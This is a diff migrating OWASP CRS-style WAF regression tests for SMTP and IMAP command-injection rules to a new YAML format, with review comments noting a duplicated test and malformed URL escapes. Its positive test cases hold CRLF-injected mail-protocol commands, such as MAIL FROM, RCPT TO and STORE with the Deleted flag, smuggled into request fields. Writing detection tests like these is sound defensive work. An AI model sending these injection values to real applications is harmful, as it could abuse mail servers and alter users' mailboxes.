port: 80 - uri: /post - version: HTTP/1.1 - data: | - name=Axel Smith - output: - no_log_contains: id "932260" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.1 + data: | + name=Axel Smith + output: + log: + no_expect_ids: [932260] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml index 3291d5d9d..d7c20aa4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml 
@@ -2,158 +2,157 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases" - enabled: true - name: 932300.yaml +rule_id: 932300 tests: - - test_title: 932300-1 + - test_id: 1 desc: "SMTP MAIL FROM Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20received%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20received%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. 
- version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aEHLO%20test.com" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aEHLO%20test.com" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 6 desc: "SMTP RCPT TO 
Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel - version: HTTP/1.0 - output: - no_log_contains: id "932300" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index ce81d351b..ba80b3424 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml 
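Review bot: Test 8 is described as the VRFY positive test, but its request line `uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E"` is byte-identical to test 6, so this file never sends a VRFY command and a regression in that part of 932300 would not be caught. The migration carries the duplicate forward unchanged; if the rule is meant to cover VRFY (the rule itself is not visible in this diff), the payload should exercise it, e.g. `uri: "/get?attackme=%0d%0aVRFY%20Postmaster"`, and the stray "TO" in the description dropped: `desc: "SMTP VRFY Command injection positive test"`. If VRFY is not in scope for 932300, the test should be removed rather than kept as a second copy of test 6.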
@@ -2,124 +2,123 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases PL3" - enabled: true - name: 932301.yaml +rule_id: 932301 tests: - - test_title: 932301-1 + - test_id: 1 desc: "SMTP DATA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=%0d%0aDATA" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=%0d%0aDATA" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20need%20that%20data%20now" - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20need%20that%20data%20now" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20World.%0adata%20not%20found. 
- version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20World.%0adata%20not%20found. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%20please%20do%20not%20quit - version: HTTP/1.0 - output: - no_log_contains: id "932301" - - test_title: 932301-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%20please%20do%20not%20quit + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] + - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aHELP%20Postmaster" - version: HTTP/1.0 - output: - log_contains: id "932301" - - test_title: 932301-7 + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aHELP%20Postmaster" + version: HTTP/1.0 + output: + log: + expect_ids: [932301] + - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20needs%20help%20now - version: HTTP/1.0 - output: - no_log_contains: id "932301" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20needs%20help%20now + version: HTTP/1.0 + output: + log: + no_expect_ids: [932301] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index 347114052..12a1676a0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml 
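Review bot: Test 3's description `desc: "SMTP Command Injection negative test 2"` is the only one in this file that does not name the command it exercises; the payload `textarea=Hello%21%20World.%0adata%20not%20found.` is the lowercase, LF-only counterpart of the DATA positive test 1, and the description should say so, e.g. `desc: "SMTP DATA Command Injection negative test (lowercase, LF only)"`. The same generic "negative test 2" wording appears for test 3 in the 932300.yaml hunk above. Naming the command keeps the FP coverage per command greppable when a rule is changed.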
@@ -2,144 +2,143 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases" - enabled: true - name: 932310.yaml +rule_id: 932310 tests: - - test_title: 932310-1 + - test_id: 1 desc: "IMAP APPEND Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Cannot%20authenticate%20anyways" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Cannot%20authenticate%20anyways" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" - version: HTTP/1.0 - output: - no_log_contains: id "932310" - - test_title: 932310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] + - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A - version: HTTP/1.0 - output: - log_contains: id "932310" - - test_title: 932310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A + version: HTTP/1.0 + output: + log: + expect_ids: [932310] + - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=The%20uid%20is%020not%020working" - version: HTTP/1.0 - output: - no_log_contains: id "932310" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=The%20uid%20is%020not%020working" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932310] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index e8b31cdb2..2ab494b9c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml 
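Review bot: Test 8's negative request on the new side still carries the pre-existing broken escape in `uri: "/get?text=The%20uid%20is%020not%020working"`; a URL decoder reads `%02` as a control byte followed by a literal `0`, not as the space the sentence implies. The stage is meant to be a plain-text true negative, so it should send the intended text: `uri: "/get?text=The%20uid%20is%20not%20working"`. Since this migration rewrites every stage of the file anyway, this is the cheapest point to correct it, and the same kind of malformed escape is carried over in the 932311 hunk (`We%examine%20this`, presumably `We%20examine%20this`) and the 932320 hunk (`top%10%20rules`, presumably `top%2010%20rules`). Leaving them as-is means those negative cases exercise control-byte inputs rather than the benign prose their `desc` describes.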
@@ -2,237 +2,236 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: IMAP Command Injection test cases PL3" - enabled: true - name: 932311.yaml +rule_id: 932311 tests: - - test_title: 932311-1 + - test_id: 1 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - X-injection-header: "CREATE:1" - method: GET - port: 80 - uri: "/get?text=We%examine%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + X-injection-header: "CREATE:1" + method: GET + port: 80 + uri: "/get?text=We%examine%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aa002%20copy%202%3A4%20MEETING - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 
932311-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aa002%20copy%202%3A4%20MEETING + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20need%20the%20list%20%22ASAP%22 
- version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20need%20the%20list%20%22ASAP%22 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 + version: HTTP/1.0 + output: + log: + expect_ids: [932311] + - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932311] + - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: 
